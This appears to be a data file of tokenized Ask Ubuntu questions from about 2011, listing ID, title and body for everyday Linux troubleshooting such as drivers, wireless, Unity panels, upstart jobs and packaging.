62424	how can i copy files from damaged external hdd ?	my external hdd is not detected in windows editions . but it is working well in ubuntu . the problem is , some of the tracks are damaged , so while browsing through the hdd , the 'nautilus ' stops working . i could not copy those files too . what is the command line arguments should i use to skip the damaged file and copy healthy files .
62434	why does upstart keep respawning my process ?	i wrote an upstart script to launch a daemon inside a tmux session . it works well and respawns the process if it dies unexpectedly , but i ca n't seem to stop it manually . the job ( called bukkit ) looks like this : start on filesystem stop on runlevel [ ! 2345 ] respawn respawn limit 5 30 chdir /home/minecraft/bukkit expect daemon kill timeout 30 pre-start script test -x /home/minecraft/bukkit/craftbukkit-0.0.1-snapshot.jar || { stop ; exit 0 ; } end script pre-stop script tmux send -t bukkit `` stop '' tmux send -t bukkit `` enter '' sleep 10 # wait for server to shut down properly end script exec tmux new-session -d -s minecraft -n bukkit `` sudo -u minecraft -- /home/minecraft/java/jre1.6.0_27/bin/java -xincgc -xmx1g -jar /home/minecraft/bukkit/craftbukkit-0.0.1-snapshot.jar '' when i issue a stop bukkit it freezes for ~10 seconds ( the sleep timer , i guess ) and prints bukkit start/running , process 2391 . when i set upstart to debug , i found these relevant lines in the log : sep 21 19:14:59 cheftest init : bukkit goal changed from start to stop sep 21 19:14:59 cheftest init : bukkit main process ( 2499 ) exited normally sep 21 19:14:59 cheftest init : bukkit main process ended , respawning sep 21 19:14:59 cheftest init : bukkit goal changed from stop to respawn why does upstart keep respawning my process when it is supposed to stop it ?
62438	how to tunnel traffic from one machine to another ?	i have a server , which can be seen from outside of my small network , sever has domain name and such . and i have a local machine , which can be seen by server , but is not accessible from outside . so i want to be able to connect to port on the sever , but talk to my local machine instead . can i make traffic arriving on one port on the server be relayed to another port on my local machine ?
62440	is it possible to boot ubuntu using the windows bootloader ?	as noted by many people , windows 8 's uefi requirements might will wo n't get in the way of installing linux ( or whatever ) , as the replacement bootloader will also need to be signed somehow . some systems all systems will let you disable the signature requirement , but the feature might be hidden to disable or you might not be willing to give up on the benefits of a secure bootloader . is it necessary to replace the bootloader in the first place ? to keep ourselves to software that 's gone golden , how can i install ubuntu 11.04 using windows 7 's own bootloader ?
62441	is there a way to open 4 terminal windows every time i login ?	i want to open four terminal windows into the first pane ( upper left-hand side ) when ubuntu boots . i have two terminal profiles : default and mail . i want two of the windows mail windows , and the other two to use the default profile . it would also be nice if i could get the terminals to ssh to where i manually send them every time i boot up . is there a way to do this ? if so , what is it in english ? i am not a computer programmer or an expert user and i ca n't even tell whether i 'm using unity , so please gear your answer accordingly . thank you !
62447	how do i stop the wallpaper from changing constantly ?	why is ubuntu continually changing wallpapers ? is there a way to stop it ? the wallpaper section in the system configuration mentions no such option .
62451	how do i install skype in 11.10 ?	how can i install skype on oneiric ?
62456	wireless drops out on wake	i 'm running ubuntu 11.04 on a laptop , and quite often ( but not always ) , if i open the lid to wake the computer from suspend , the wireless connection finds nothing . i 've tried using ifup and ifdown , but to no avail . the only solution i 've found is to reboot the whole system . any solution - a setting somewhere , a text file to edit or a script to run ? thanks .
62462	disable wlan0 -device permanently	i executed unsuccessfully the following line in /etc/rc.local with permissions 755 : sudo ifdown 00:1f:9c : c3 : b3:77 where the last word is presenting the address of my wlan0 device . having the command rfkill block $ ip-address-of-my-wlan0 in startup scripts is not possible solution , since network-manager is able to change soft-blocks . you can not configure each device separately in network tools or in network manager . if you change one setting the setting applies to other wifi -device too . i can not use wicd because i need network manager 's mobile broadband -feature . how can you put a permanent software block to the given wifi -device in ubuntu 11.10 at each startup such that other programs such as network manager do not change it ? there is probably a file which permissions are only needed to be changed to 700 to disallow for example network manager to reach the device wlan0 . how can you give only the user the permission to touch the device wlan0 ?
62464	locating groovy installed via sts	i have installed the groovy plugin for eclipse as part of the springsource tool suite groovy and grails support . this works well . i now want to set my groovy_home environment variable so i can use groovy from the command line using the groovy already installed . i have not been able to locate the installation of groovy installed under sts . how can i find the path for groovy_home ?
62465	10.04 lts svn how quick are updates ?	i am new to ubuntu lts . i am using the svn server that comes with 10.04 it is 1.6.6 . the current version is 1.6.17 . how quickly can i expect an update to the lts applications ?
62466	remove application shortcut from unity panel	how do i remove an application shortcut from the unity panel ( not launcher bar ) ? my specific issue is i tried to install a game using wine a while ago . i then uninstalled the game , then uninstalled wine . today i found that shortcuts to the game ( and other related content that came with it ) remain when i push super and type the game name . ( wine is not visible though . )
62468	does ubuntu import the universe repository from debian ?	does ubuntu import the universe repository from debian ?
62472	why does n't chromium get quicker updates ?	i 'm running 10.04 and i 'm still only on v12 even though we 've just had v14 pushed out by google and on 3 sept a big update to v13 that revoked the diginotar certificates . i was running a ppa at one point but i ca n't remember when . even so this state of affairs hazardous .
62478	how do i increase the volume beyond 100 % in kubuntu ?	the unity/gtk volume manager that comes with vanilla ubuntu lets you increase the volume past 100 % , which is useful for hearing quiet youtube videos . is there a way to achieve the same thing with the kde mixer app ?
62483	some windows do n't fit on 1024x600 , what can i do ?	i read on wikipedia that the netbook edition of ubuntu was discontinued and that it is now integrated into the main distribution ( as of 11.04 ) . i tried 11.04 on my new samsung nc110-a06au with 10.1 '' 1024x600 display . most things worked out of the box , but some ( like backlight power control ) needed some coercion before they began to co-operate . one thing that seems to be an ongoing problem is the resolution . at 1024x600 , most of the dialogue boxes run off the bottom of the screen , including the update manager . i have tried 11.10 beta 1 and it has the same problem . is there any way to fix this , or at least make it more usable ? ( i suspect not ) . given the recent rise in popularity of netbooks , do you think ubuntu will include a low-resolution-friendly version in the near future ? how well does kde deal with these low resolutions ? i noticed kde plasma has a netbook interface . is it worth switching for that ?
62484	wo n't install on an hp pavilion with a radeon hd6470m	i have recently purchased an hp pavilion with a radeon hd 6470m card that is not supported . until i found that out i reinstalled ubuntu several times and eventually got some basic drivers to work . due to a software i installed , i made some tweaks and broke it again , and now i ca n't install ubuntu . to try fix the problem i loaded win7 ( i 'm dual booting ) , and reformatted ( slow ) the ubuntu partition . i subsequently lost the boot for win7 , which i fixed . however , every time i try to install ubuntu 11.04 it either displays a black screen ( does n't even go as far as letting me choose to `` use ubuntu without installing '' ) , or stops loading saying that it has `` bad target number '' . i even tried the alternate cd , which installed ubuntu but will not go past the grub ( even when i use `` nomodeset '' ) . i have absolutely no idea what else to try . any help would be greatly appreciated .
62491	is it possible to put unity on the bottom of your screen ?	i would like to place unity bar at the bottom of my screen . is this possible in 11.04 ? if not will it be possible in 11.10 ubuntu version ?
62492	how can i change the date modified/created of a file ?	is there a way to change the date when a file was modified/created ( which is shown in nautilus or with the ls -l command ) ? ideally i am looking for a command which can change the date/time stamps of a whole bunch of files to a certain amount of time earlier or later ( e.g . +8 hours or -4 days etc . ) .
62493	is there an ubuntu one server in south africa ?	i would like to know if ubuntuone has server locally in south africa ? i currenly use dropbox , but due to bandwidht speeds the sync speed is not what it should be . it would be great if theres a local server ( s ) to handle file sync and streaming audio .
62495	how to change the window theme in gnome shell	i use gnome shell on ubuntu 11.10 . i can use gnome tweak tool to change the gtk theme and icon theme , but i ca n't change my window theme . if i select anything other than the default theme `` adwaita '' , and restart gnome shell , it reverts to the accessibility theme . how can i change the window/metacity
62502	are there 3d effects on xubuntu ? ( hardware-accelerated graphics )	does the default xfce 's window manager offer any 3d eye candy ? if it does , how do i enable it after installing the relevant drivers ? i want to install nouveau 's experimental 3d driver ( which worked great for me under ubuntu ) , libgl1-mesa-dri-experimental , in xubuntu . but i do n't know if just installing it will enable any 3d effects .
62505	backup by compress tar each directory	iâm looking for a method to scan a directory ( not recursive ) and tar it using the original folder name , and then delete the folder ( so i will have only the folder compressed ) anyone has the command for that ?
62509	no audio through hdmi in kubuntu	when i plug in hdmi cable in my geforce video card in order to watch movie on my tv in multimedia — sound — video preferences window i see hdmi and built-in analog device . when the later gets higher priority then the former i can hear movie sound ( playing through dragon player ) from pc speakers . when i reverse priority order i expect tv to play movie sound ( which is what i really want ) but get no sound at all . any suggestions how to get sound through hdmi ? i 've searched the forum and found lots of questions concerning hdmi audio , but could n't find solution working for me . at least : my s/pdif device is unmuted in alsamixer . upd the output of most some commands may help . $ uname -r 2.6.38-8-generic $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gt215 [ geforce gt 240 ] ( rev a2 ) $ aplay -l **** список playback устройств **** карта 0 : intel [ hda intel ] , устройство 0 : alc883 analog [ alc883 analog ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 0 : intel [ hda intel ] , устройство 1 : alc883 digital [ alc883 digital ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 2 : nvidia [ hda nvidia ] , устройство 3 : hdmi 0 [ hdmi 0 ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 2 : nvidia [ hda nvidia ] , устройство 7 : hdmi 0 [ hdmi 0 ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 2 : nvidia [ hda nvidia ] , устройство 8 : hdmi 0 [ hdmi 0 ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 2 : nvidia [ hda nvidia ] , устройство 9 : hdmi 0 [ hdmi 0 ] подустройства : 1/1 подустройство №0 : subdevice # 0
62512	how do i add a button or context menu option for clearing recently viewed files ?	i really miss the function from 10.04 where i easily could delete my recently viewed files by a mouse-click . is it possible to get this feature in ubuntu 11.04 ? for example , by adding a right-click function or a simple button on the top right of the recent-list saying `` empty '' ?
62515	lenovo s10-3 wifi switch problem	i installed ubuntu 11.04 on my lenovo netbook s10-3 . everything is working so good , wifi , camera , and even my usb broadband . but one time i turned off my wifi using wifi switch ( it 's a hardware switch locating in left side of the laptop ) and turn it back on it did n't work now . and i ca n't even connect to the other wifi network . in network settings it said `` wireless is disabled by hardware switch '' but i already turn it on , even i used fn+f5 which is command for on/off on wifi it did n't work . anyone can help me on this ? eth0 link encap : ethernet hwaddr 60 : eb:69 : ce : d6:31 inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :62eb:69ff : fece : d631/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:491 errors:0 dropped:0 overruns:0 frame:0 tx packets:547 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:265756 ( 265.7 kb ) tx bytes:67776 ( 67.7 kb ) interrupt:42 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) i ca n't used the link because i totally delete my windows . *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 02 serial : 60 : eb:69 : ce : d6:31 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.7 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f0520000-f0520fff memory : f0510000-f051ffff memory : f0540000-f055ffff *-network disabled description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth1 version : 01 serial : ac:81:12:48 : e6:44 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:18 memory : f0100000-f0103fff 0 : brcmwl-0 : wireless lan soft blocked : yes hard blocked : yes 1 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no
62518	how burn or mount an iso file ?	i have downloaded iso files recently . how do i burn it to a cd or dvd or mount it ?
62521	error after upgrading bugzilla from 4.0 to 4.0.2	i had a good working new installation of bugzilla 4.0 . i have upgraded to version 4.0.2 using the patch . everything went ok until i had to clear the shutdownhtml field in the params page http : //192.168.0.22/bugzilla/editparams.cgi doing that , gave the error on the screen : software error : error reading ./data/params : permission denied at bugzilla/config.pm line 323 . compilation failed in require at /var/www/bugzilla/editparams.cgi line 28 . begin failed -- compilation aborted at /var/www/bugzilla/editparams.cgi line 28 . for help , please send mail to the webmaster ( webmaster @ localhost ) , giving this error message and the time and date of the error . ok , it 's definitely a permission error . i have set /var/www/bugzilla as follow : drwxr-xr-x 16 www-data www-data 4096 2011-09-22 12:58 bugzilla/ q1 : what user should have done the patch upgrade ? i used administrator with sudo . -- was that wrong ? q2 : what should be the settings for the directory structure and files ? is n't 755 and chown/chgrp www-data is enough ? answer : i had to change the following directory in order to fix the permission rights chmod 777 /var/www/bugzilla/data/template/template/en/default ( for all changes to be written ) chmod 777 /var/www/bugzilla/data/params this works , but still i do n't know how it happened .
62526	why is there not much space for my ubuntu ?	i have a dual system : windows 7 + ubuntu . the windows came with my laptop and i installed ubuntu without wubi ... my total filesystem capacity : 303.2 gb , i just do not understand why there is not much space for ubuntu . here is a screenshot of disk usage analyzer , where the 新家卷 under media is a disk mounted : here are the screenshots of disk utility , i even do not know which disk is for ubuntu i can delete many films to save space under windows , but it seems that there is nothing to do with ubuntu ... could anyone help ? thank you very much edit1 : as requested , here is the result of df -h : ... @ ubuntu $ df -h filesystem size used avail use % mounted on /dev/loop0 17g 13g 2.8g 83 % / none 2.0g 716k 2.0g 1 % /dev none 2.0g 4.3m 2.0g 1 % /dev/shm none 2.0g 112k 2.0g 1 % /var/run none 2.0g 0 2.0g 0 % /var/lock /dev/sda3 188g 176g 12g 94 % /host /dev/sda5 100g 99g 1.9g 99 % /media/新加卷
62534	adding post .deb install scripts	so i 'm building a .deb , and i need to do a few post-install commands ( linking libraries paths , and a few other things ) . is there a way to have it so when you do a sudo dpkg -i < pacakage-name > .deb , a script runs ?
62535	how do i set up usb security key based authentication ?	is it possible to get ubuntu to lock and unlock itself , if a particular usb stick is attached ? for example ; i sit down at my laptop ; i plug the usb stick in and the system unlocks and presents itself . i take the usb stick out , and the system locks and can not be unlocked without that particular usb stick . is there any way to do this , my friends ?
62553	touch to launch multiple software instances under unity	i would like to change the touch/shortcut ( middle mouse button or right+left at the same time ) that launch a second time the application under unity . example : -i have a touchpad without and the middle touch in the middle does n't work -chromium is already open and reduced . and i want to open a new windows without touching the first one . what should i do ? right+left click on chromium icons . it 's not really convenient .
62557	what is `` the star '' communicating in synaptic ?	a star sometimes appears next to things in the synaptic list . what is the star there for ? what is it telling me ?
62562	run a program with gnu screen and immediately detach after	i am trying to figure out how to write a script which would start program ( s ) in gnu screen sessions ( s ) at system boot . i am trying this : # ! /bin/bash screen -s test -d -m -x $ home/folder/folder/.program \ screen -s test2 -d -m -x $ home/folder/folder/.program2 \ but the command cant be executed because session is already detached ? the only thing that i need is run command in screen session and detach this session immediately . thanks for answers , but now i faced another problem . script stops working after i put some variables for my `` program and program2 '' . something like this : # ! /bin/bash screen -s test -d -m $ home/folder/folder/.program -f config.cfg for some reason `` -f config.cfg '' got ignored . i am also tried to quote command and doesnt help too .
62564	how do i disable the guest session ?	how do i disable the guest session in ubuntu 11.10 or higher ? i do n't want people to be able to use my computer without using a password to log in !
62568	application icons not showing up in top panel	it seems that some applications which used to have a representing icon on the top panel are running ( see them in the process list ) , but no longer have representation on the top panel , as if ubuntu 11 lacks the `` target '' to put those icons at . any way around that ?
62569	missing top and bottom panels in ubuntu 11.04	i 'm missing top and bottom panels in natty . googling for this the most common resolution is : a @ omnipresent ~ % gconftool-2 -- shutdown a @ omnipresent ~ % rm -rf ~/.gconf/apps/panel a @ omnipresent ~ % pkill gnome-panel however , this is not helping me . it does not bring the top and bottom panels back . is there something else that i should be trying ? update no lsb modules are available . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty
62576	accidentally unchecked unity in system settings - blank desktop ?	accidentally unchecked `` unity '' in system settings . now my ubuntu 11 boots into a `` desktop background only '' screen . no panels , no icons . although i was able somehow to invoke nautilus . any way i can launch the system settings process and change that ? or am i doomed to format my machine and re-install everything ?
62577	pressing 'd ' shows the desktop , how to disable ?	how do i stop d from showing the desktop ? when i rdp ( xrdp ) or vnc ( built-in or x11vnc , client-side ultravnc ) , pressing 'd ' shows the desktop . please tell me how to remove this binding .
62581	identical folders in home directory after decryption of home directory failed	so this morning i turned on my laptop , and everything seemed to be going fine until i logged in . all my settings were gone , back to the default desktop , default programs and everything . i did an 'ls ' on my home directory , and it was just a bunch of `` ecryptfs '' files . i have home directory encryption turned on , so i figured the decryption of my home directory failed for some reason . anyway , just to be careful , i booted into a live session on a usb drive , and used ecryptfs-mount-private to decrypt my home folder . that seemed to work fine . it looked like everything was there until i tried to cd into my music folder . nothing there . anyway , i checked my disk usage , and it 's the same as it was last night , so my ( somewhat massive ) music collection is definitely still there . then i did an ls on my home folder . this is what i saw : it appears that all of the default folders that ubuntu creates are duplicated within the same folder . i did n't know that was even possible . when i cd into music , it 's empty , but there 's another music folder there , and i have no idea how to get to it . i 'm not even sure my files are in there , because du -sh reports that both copies of the music folder are just 4.0k however , if my music collection were actually gone , i should have a lot more free disk space . anyway , i have no idea what to do . it 's not critical that i get anything back ( all my important files are backed up on dropbox , and it looks like most everything survived ) , but it would be nice to have my music collection . anyway , help is much appreciated . thanks !
62582	single server , multiple users , each with his own virtual machine	our school system has a low budget to update our computers , so i 've thought maybe i could buy only one server ( a powerful one ) and hookup 30 students to one server . on the server should be 30 ubuntu virtual machines , each controlled by a different keyboard and mouse + individual monitor . i 've looked over the internet but could n't find no simple solution , some say you ca n't some say you could if blablabla on windows , but i want to run it on ubuntu . could someone point to some docs or solutions if you know , we would greatly appreciate it .
62585	how do i set a new xdg-open setting ?	i want to use xdg-open to open irc : // links , how can i make the required parameter ?
62587	how can i stop my samsung nc150+ from thinking it 's american and no longer being able to connect to wireless networks set to channel 12 and 13	so a while a go i discovered that the reason why everyone else was able to connect to the wireless except for me ( whilst being able to see other networks ) was that the wireless i used to be able to connect to is on channel 13 and my computer only sees up to 11 these days . how would i go about having it listen to 12 and 13 again ?
62589	remotely access and use windows machines	i want to try and use windows machines from an ubuntu instance , what are my options to achieve it ? how do i set either ubuntu and windows to allow remote desktop ?
62591	only one monitor shows options in nvidia-settings	i have dual monitors setup with ubuntu 11.04 . one is a dell and other is hannsg . i suspect that the hannsg monitor is not setup correctly as the colors look very weird . i think the problem is with nvidia-settings not showing all options for my hannsg monitor . dell monitor settings : hannsg monitor settings this is the relevant section of my xorg.conf section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` metamodes '' `` crt : nvidia-auto-select +1280+0 , dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection question what do i need to do in order to see all the settings for my hannsg monitor ?
62595	how to use wildcards with aptitude ?	is there a way to use wildcards with aptitude such as in the following : sudo apt-get remove openoffice* . *
62596	sexy and clean editor	does one of you know a sexy and clean editor ? most of them look very fuzzy on me , well , i think ubuntu in a general sense looks very fuzzy . does anyone know why ? well , i ca n't really tell you how i mean it , but if have a look at windows , os x and gnome or kde , both of them seems very fuzzy , the font is not clean and so on .
62599	what is the default username for amazon ami images of ubuntu server ?	i just launched one of the ubuntu server ami 's on amazon ec2 . i connect just fine , but i do n't see anything to tell me the default login credentials . login as : ?
62600	not all music in the cloud is visible on the iphone	i downloaded my music collection to ubuntu one . i can see it in the cloud , but not every song appears on my iphone .
62605	i can not create ad-hoc wireless networks and stay connected . how can i fix this ?	i 'm on 11.10 , and no wireless networks i create are staying connected . i had created one called `` cookie '' many moons ago , then deleted it some time after upgrading to 11.10 . strangely , that network showed up today , after applying some updates , yet the system still will not remain connected to any ad-hoc networks i create . i reported a bug ( as one should do ) but it has been ignored for a long time now , and it is allegedly fixed , but i still have the problem . see this output : http : //pastebin.com/laeb9h1u what can i do to get normal functionality back ? is there some way to clean network manager 's configuration so i can start with a clean slate without reinstalling the entire system ?
62607	what 's the best way to use parallel bzip2 and gzip by default ?	bzip2 and gzip only use one core , although many computers have more than one core . but there are programs like lbzip2 , pbzip2 and pigz , which use all available cores and promise to be compatible with bzip2 and gzip . so what 's the best way to use these programs by default , so that tar cfa file.tar.bz2 directory uses lbzip2/pbzip2 instead of bzip2 ? of course i do n't want to break anything .
62611	visual boy advanced emulator runs too fast	i just got the visual boy advanced emulator 1.8.0 but it runs at 125 % - 200 % too fast , and if i throttle it to 100 % the sound goes real slow .
62612	is it possible to install mercurial 1.9 on 9.10 ?	so i have an old server which i want to use as mercurial repository host . apt-get install mercurial gives me v0.9 , which is stoneage and without windows filename workaround , which i rely on . i 've downloaded the v1.9 source and tried to build it but i end up in a web of depedency conflicts . is it any way i can get v1.9 of mercurial to run in an intrepid installation ( kernel 2.6.24-19-generic ) ? if not , how about 1.1 ( the first one with windows filename workaround ) ?
62613	how to convert windows/mac operating systems created , mpg file to linux compatible file ?	i have one file film.mpg . which is 720p and 50 frames per second . when i play the file using gst-launch playbin uri=file : ///tmp/final.mpg it does not work . but it works with mplayer/vlc . i noticed that i can convert the file and it also works but then i lose quality . so my question is . how do i use ffmpeg to convert file.mpg to better quality file.avi or other formats , so that i have balanced video/audio or almost same working . follow up : by doing this its working : ffmpeg -sameq -i filmfr2.mpg filmfr2.avi
62616	will 11.10 come with keyboard short-cuts for the file and applications lenses ?	since alpha/beta of 11.10 i miss my very often used shortcuts `` super '' + '' f '' and `` super '' + '' a '' will they be implemented again in the final version of 11.10 ?
62622	shell can not find executable when duplicate name deleted from path ?	i have compiled a package named xxx.now i have deleted the files related with xxx and installed using repository.but if i type command [ root ] $ xxx , the following message is coming -bash : /usr/local/bin/xxx : no such file or directory and if i try , [ root ] $ /usr/bin/xxx -v it is working . where i want to change the installation location.or i want to create a symbolic link in /usr/bin/ which points to /usr/local/bin/xxx
62632	how can i make chrome follow my window focus settings ?	i run my desktops with pointer focus ( that is , focus is based on mouse position ) . i 've been doing that for literally decades , so i 'm not stopping now . in that model , i absolutely do not want `` auto-raise '' behavior , because , well , it puts me in a killing rage when the window manager randomly decides to raise a window while i 'm in the middle of doing something . up until recently , this worked out fine in xfce with the default xfce window manager . however , of late i 've noticed that ( in particular with chrome ) that the application seems to deliberately override my desire to not have `` auto-raise '' behavior . for example , if i want to have a chrome window open with something on it for me to peruse , and another chrome window behind it that i want to type into ( like , a stack exchange site ) , well , i ca n't . when i mouse out of the foreground window to type into the other chrome window , the other window auto-raises . this makes me very very upset . this seems to be an application thing , but i 'm not really sure . if i bring up two xterm windows , for example , i do n't get the effect . in fact i really do n't get it with anything other than chrome , now that i think about it . so is this a chrome `` feature '' ? is there a way to make it stop doing that ?
62633	how to open kcrash files and/or launch drkonqi manually ?	so i was playing with kdenlive and it crashed ( i did n't add ppa and 11.04 repos has outdated version . it was fixed for 11.10 though ) . `` drkonqi '' [ as always ] said that there is not enough useful information ( how do i suppose to check that i 've tried to reproduce the bug since it is the first time it happened ? ) . and i saved the report in a .kcrash file . i 've reproduced the bug some seconds later , yes . but i closed drkonqi and wanted to open the first report . and i just could n't . there is no drkonqi package to dpkg -l it , there is no such executable in the path , .kcrash files is not recognized nor in the nautilus neither in the dolphin .
62637	advice for a high-end ubuntu-friendly laptop ?	since i figure the collective computer knowledge on these forums is pretty high , i was wondering if someone could give me advice for buying a new laptop . i 'm looking for something with : -high linux compatibility -sandy bridge i7 processor -low end but better-than-integrated graphics ( amd preferred , since nvidia optimus has linux issues ) -blu-ray drive -not a mac i 've been looking around at lenovo and asus , but i have n't found anything yet that fits all of these requirements . anybody have experience/suggestions ? i 'm not a hardcore gamer , but i would like to be able to play games/experiment with graphics programming on this , it 's more than just an internet machine .
62640	after apt-get autoremove : missing operating system	after a sudo apt-get upgrade i was told that some packages could be safely removed . i guess these were old kernels , so i did sudo apt-get autoremove but now the system wo n't start anymore and just says missing operating system . the computer unfortunately does n't have a cd drive for a live cd . i guess i could boot from a usb stick , but what exactly would i then do for a recovery ?
62642	remove noise in video created by recordmydesktop ?	i need to record some activity on my desktop with voice , but recordmydesktop really does n't provide an acceptable record . here are two solutions came into my mind , strip off the voice from that video , use audacity to remove noise , and put it back , but how ? directly edit it , but what tool could do it ? thanks ! p.s : source file already encoded from .ogv to .avi with mencoder
62646	how do you swap the caps lock key to control key in lxde ?	i know it is easy to this in gnome , but how can i do it in lxde ?
62654	disable global keyboard shortcuts for specific application	is it possible to disable the gnome ( version 2 ) global keyboard shortcuts for a specific application ? i 'm using the intellij idea java ide under ubuntu however some of the idea default keyboard shortcuts conflict with the gnome shortcuts ( e.g . alt+f1 , ctrl+alt+→ or ctrl+alt+← ) . i really do n't want to change the conflicting shortcuts within idea . i need to use the default keymap for `` compatibility '' reasons . i 'm thinking of some kind of proxy command that redirects every keyboard activity to the application when it has the focus . something like kbdproxy idea.sh .
62655	`` less '' does n't automatically decompress gzipped files	on fedora/redhat/centos the less command seems to magically detect a gzipped file and decompress it on the fly , so you can do : less my_stuff.csv.gz i 've just noticed this does n't work on ubuntu 11 less my_stuff.csv.gz '' my_stuff.csv.gz '' may be a binary file . see it anyway ? i 've been examining my centos vms to see if there 's some shell alias magic that makes it work but there does n't seem to be . is gzip support just built in to the centos binary ? if anyone knows how this works on centos and/or how it can be made to work on ubuntu i 'd be grateful . i 'm aware i can do zcat my_stuff.csv.gz | less but that would make my keyboard wear out more quickly .
62657	ca n't get past the ubuntu loading screen when installing	i 'm trying to install ubuntu 11.04 onto some custom made pc that my father in law tried building . it had windows on it , but he wants ubuntu so he asked me to do it . i 've installed ubuntu 11.04 on a few computers no issues , but on this computer i get to the all purple screen with the ubuntu logo and the orange and white dots that light up . like this : the fan is also super , super loud and sounds like the whole thing is going to explode and has been running like this for 15 mins ish . then , after about 15 mins the dots stop animating from orange to white and usually just stick at all orange . any ideas ?
62658	how do i installing gnome shell ?	i just wanted to test the gnome shell on ubuntu 11.10 , but i 'm getting the following error . gnome-shell : depends : libcogl2 ( > = 1.7.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried to install the libcog12 as well , but some packages will be removed , so i canceled because i do n't want to crash my ubuntu again : )
62664	how can i remove empathy , and integrate pidgin ?	i do n't like the empathy chat client , and i want to use pidgin instead , but i want to maintain the functionality empathy has in the messaging menu . how can i do this in the cleanest way possible ?
62667	can i use xen virtualization/paravirtualization when my processor does n't support vtx ?	i have a server ( 4 gb ram , 64-bit intel atom 330 1.6 ghz processor ) . the processor does n't support any kind of virtualization ( i looked up the documentation ) . can i still use xen to make several servers out of it , using virtualization or paravirtualization ? if yes , please also name whether it 's virtualization or paravirtualization that 's possible .
62670	hp pavilion with radeon 6470m hangs with black screen on boot	i have recently purchased an hp pavilion with a radeon 6470m graphics card . i subsequently found out that this card is not yet supported for ubuntu by ati . i followed the instructions of post # 2 in this thread ( ubuntuforums.org : no compiz and no unity in ubuntu 11.04 ) and installed the xorg-edgers ppa , which i think helped . i have not installed the ati drivers , as every time i tried them the graphics were abysmal . i will wait for the version where my card is supported . however , there are times where when i boot that it hangs in a black screen . i have noticed that if it hangs , then the only way to get going is to boot with `` nomodeset '' , and then restart , which seems to load the full graphics , using the generic drivers . this might simply be a coincidence ( i have n't tried it enough times ) . is there anything i can do to stop this `` hanging '' thanks in advance for your help . update : i have noticed that most times it hangs on the black screen and a few times it loads all the way . i 'm assuming something conflicts , but i 'm not sure what .
62671	ca n't get optimus to work with ironhide on an asus n53sn	i installed ubuntu 11.10 ( same issue in 11.04 btw ) and then i installed ironhide . i went through the configuration , chose the one with the highest confirmation for my system and tested it : > error : module nvidia does not exist in /proc/modules > p50 disabling nvidia card succeded ( the spelling error is theirs ) and it changes nothing . i tried other configurations and got worse results . this has really become a major headache . any solutions ?
62674	how to make one program use a specific network card ?	at work they have disabled the use of p2p networks such as bittorrent . ( causes too many open connections according to the admins . ) is there a way to let all programs , except transmission use eth0 and transmission use usb0 ?
62679	is there a player that merge the end of a music with the beginning of the next ?	in winamp 3 for windows , there 's a feature that the last 3 seconds of the music is merged with the first 3 seconds of the next music , so there 's no `` empty space '' between the musics . is there a way to do this with rhythmbox ? or is there any player for ubuntu that has this feature ?
62681	how do i setup dual monitors in xfce ?	i 've got an laptop with a intel chip , and i 'd like to setup dual monitors in xfce . how do i do this ?
62684	lenovo l520 hd 3000 driver problem	i bought a lenovo l520 with intel hd 3000 graphics . i installed ubuntu 11.04 latest release . when i start up the laptop by default i get the start sound and then i see vertical colored lines flickering on the menubar and the mouse pointer which i can move . i fixed this problem already by editing the startup script in grub adding nomodeset . now it starts up normally . but the problem is that the resolution is 1024*786 and this is also the highest resolution available . the display window says something like unknown , so i think that there are no correct driver installed . i also made a software update . what have i done wrong ? 11.04 should have intel hd 3000 support ?
62686	how can i use my gpass data ?	there are two parts here : it appears that gpass is dropped in oneiric so can anyone recommend a new password manager ? is there a way to open the file created with gpass , or do i need to recover the passwords in another install of gpass and manually move the passwords into the recommended replacement ?
62688	how to set up cloud image in virtualbox ?	i would like to turn the disk image from a cloud image ( former uec image ) into a bootable virtualbox ( for vagrant ) . i can run the image in kvm ( using https : //help.ubuntu.com/community/uec/images as a starter ) , but how can i turn the .img disk file into a bootable virtualbox disk ? i would rather not use the floppy as boot .
62689	language support problems	i 'm running 11.04 . i want the system language to be in german . when i go to language support and install/remove languages , i check the german box and apply changes . however i 'm told that the package is already installed and that there is n't any need for an installation . expanding the details shows : package [ dbus.string ( u'libreoffice-gnome ' ) ] is already installed however , german does n't appear in the language for menus and windows list . how should i resolve this ? the problem is the same when i tried esperanto and afrikaans .
